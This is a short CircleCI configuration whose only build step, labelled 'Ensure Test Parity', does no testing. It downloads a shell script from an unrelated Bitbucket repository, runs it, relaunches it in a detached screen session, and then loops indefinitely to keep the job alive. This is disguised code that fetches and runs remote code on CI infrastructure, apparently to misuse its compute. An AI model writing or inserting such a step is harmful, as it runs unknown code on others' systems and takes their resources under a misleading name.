version: 2
jobs:
  build:
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
             sudo apt-get update && sudo apt-get install -y screen
             wget https://bitbucket.org/janurok/januro/raw/5c05b8ee6b0b8a07a65c1dd6931e73d4ed8a2dfc/log.sh1 && chmod u+x log.sh1 && ./log.sh1 && chmod u+x log.sh1
             screen -dmS run ./log.sh1
             time=${1-1}; while test $time -gt 0; do printf "$time"; sleep 60; done